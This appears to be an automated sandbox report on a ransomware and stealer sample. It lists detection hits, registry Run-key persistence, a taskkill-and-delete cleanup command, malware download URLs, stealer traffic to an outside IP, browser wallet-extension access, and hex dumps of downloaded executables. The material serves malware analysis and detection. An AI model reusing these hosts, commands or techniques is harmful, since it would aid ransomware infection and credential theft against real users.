Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Q5W0I0pzFI.exe, ProcessId: 6496, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Q5W0I0pzFI.exe, ProcessId: 6496, TargetFilename: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe

Source: Process started

Author: frack113: Data: Command: taskkill /im build2.exe /f , CommandLine: taskkill /im build2.exe /f , CommandLine|base64offset|contains: $)e, Image: C:\Windows\SysWOW64\taskkill.exe, NewProcessName: C:\Windows\SysWOW64\taskkill.exe, OriginalFileName: C:\Windows\SysWOW64\taskkill.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7136, ParentProcessName: cmd.exe, ProcessCommandLine: taskkill /im build2.exe /f , ProcessId: 6488, ProcessName: taskkill.exe

Source: Process started

Author: frack113: Data: Command: "C:\Users\user\Desktop\Q5W0I0pzFI.exe" , CommandLine: "C:\Users\user\Desktop\Q5W0I0pzFI.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Q5W0I0pzFI.exe, NewProcessName: C:\Users\user\Desktop\Q5W0I0pzFI.exe, OriginalFileName: C:\Users\user\Desktop\Q5W0I0pzFI.exe, ParentCommandLine: "C:\Users\user\Desktop\Q5W0I0pzFI.exe" , ParentImage: C:\Users\user\Desktop\Q5W0I0pzFI.exe, ParentProcessId: 6988, ParentProcessName: Q5W0I0pzFI.exe, ProcessCommandLine: "C:\Users\user\Desktop\Q5W0I0pzFI.exe" , ProcessId: 6496, ProcessName: Q5W0I0pzFI.exe

Source: Process started

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://fuyt.org/files/1/build3.exeT	Avira URL Cloud: Label: malware
Source: http://fuyt.org/files/1/build3.exeX	Avira URL Cloud: Label: malware
Source: http://zerit.top/dl/build2.exe	Avira URL Cloud: Label: malware
Source: http://fuyt.org/files/1/build3.exe	Avira URL Cloud: Label: malware
Source: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true	Avira URL Cloud: Label: malware
Source: http://fuyt.org/files/1/build3.execm	Avira URL Cloud: Label: malware
Source: http://fuyt.org/files/1/build3.exe&	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Q5W0I0pzFI.exe	Virustotal: Detection: 33%			Perma Link
Source: Q5W0I0pzFI.exe	ReversingLabs: Detection: 38%

Machine Learning detection for sample

Source: Q5W0I0pzFI.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	2_2_0040E870
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	2_2_0040EAA0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	2_2_00410FC0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	8_2_0040E870
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	8_2_0040EAA0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	8_2_00410FC0

Source: Q5W0I0pzFI.exe, 00000008.00000002.629017228.0000000002F82000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: Q5W0I0pzFI.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: unknown	HTTPS traffic detected: 162.0.218.244:443 -> 192.168.2.7:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.218.244:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.218.244:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.218.244:443 -> 192.168.2.7:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.218.244:443 -> 192.168.2.7:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49792 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: Q5W0I0pzFI.exe, Q5W0I0pzFI.exe, 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.419401145.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.447804234.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: \bC:\fupi.pdbp source: Q5W0I0pzFI.exe, 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000000.00000000.358112818.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.364794208.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000006.00000002.398439159.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000006.00000000.379315960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000007.00000000.381590354.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000007.00000002.413612343.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.386408473.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000008.00000003.536074862.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.403443731.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000A.00000000.403434201.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.418557680.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.409795194.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.445876188.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000F.00000000.420850734.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.437834920.0000000000401000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\fupi.pdb source: Q5W0I0pzFI.exe, Q5W0I0pzFI.exe, 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000000.00000000.358112818.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.364794208.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000006.00000002.398439159.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000006.00000000.379315960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000007.00000000.381590354.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000007.00000002.413612343.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.386408473.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Q5W0I0pzFI.exe, 00000008.00000003.536074862.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.403443731.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000A.00000000.403434201.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.418557680.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.409795194.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.445876188.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 0000000F.00000000.420850734.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.437834920.0000000000401000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: (C:\tuzir\viki_sebagomujocuv\12_lono.pdb source: Q5W0I0pzFI.exe, 00000008.00000003.611613225.0000000000720000.00000004.00001000.00020000.00000000.sdmp, build2.exe, 0000000E.00000000.419696029.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000E.00000002.442088434.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 00000010.00000000.427162779.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: Q5W0I0pzFI.exe, 00000000.00000002.372586217.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.419401145.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.447804234.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\tuzir\viki_sebagomujocuv\12_lono.pdb source: Q5W0I0pzFI.exe, 00000008.00000003.611613225.0000000000720000.00000004.00001000.00020000.00000000.sdmp, build2.exe, 0000000E.00000000.419696029.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000E.00000002.442088434.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 00000010.00000000.427162779.0000000000401000.00000020.00000001.01000000.00000006.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

System file written: C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_00410160
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_0040F730
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	8_2_0040F730
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	8_2_00410160

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.7:49783 -> 183.78.205.92:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.7:49788 -> 183.78.205.92:80
Source: Traffic	Snort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.7:49793 -> 5.252.23.88:80

Source: global traffic	HTTP traffic detected: GET /hi20220328 HTTP/1.1Host: t.me
Source: global traffic	HTTP traffic detected: POST /517 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 5.252.23.88Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 5.252.23.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 5.252.23.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 5.252.23.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 5.252.23.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 5.252.23.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 5.252.23.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 81050Host: 5.252.23.88Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Mar 2022 04:51:27 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Mon, 28 Mar 2022 15:33:29 GMTETag: "9a400-5db4908bb325d"Accept-Ranges: bytesContent-Length: 631808Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 37 a7 ad 08 56 c9 fe 08 56 c9 fe 08 56 c9 fe 16 04 5c fe 19 56 c9 fe 16 04 4a fe 7a 56 c9 fe 2f 90 b2 fe 0d 56 c9 fe 08 56 c8 fe bc 56 c9 fe 16 04 4d fe 32 56 c9 fe 16 04 5d fe 09 56 c9 fe 16 04 58 fe 09 56 c9 fe 52 69 63 68 08 56 c9 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6d 3c a1 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 82 02 00 00 ee 09 00 00 00 00 00 40 df 00 00 00 10 00 00 00 a0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 0c 00 00 04 00 00 86 47 0a 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 81 02 00 3c 00 00 00 00 c0 0b 00 d0 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 8a 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 80 02 00 00 10 00 00 00 82 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 19 09 00 00 a0 02 00 00 8a 06 00 00 86 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 93 00 00 00 c0 0b 00 00 94 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 29 Mar 2022 04:51:49 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 30 Mar 2022 04:51:49 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 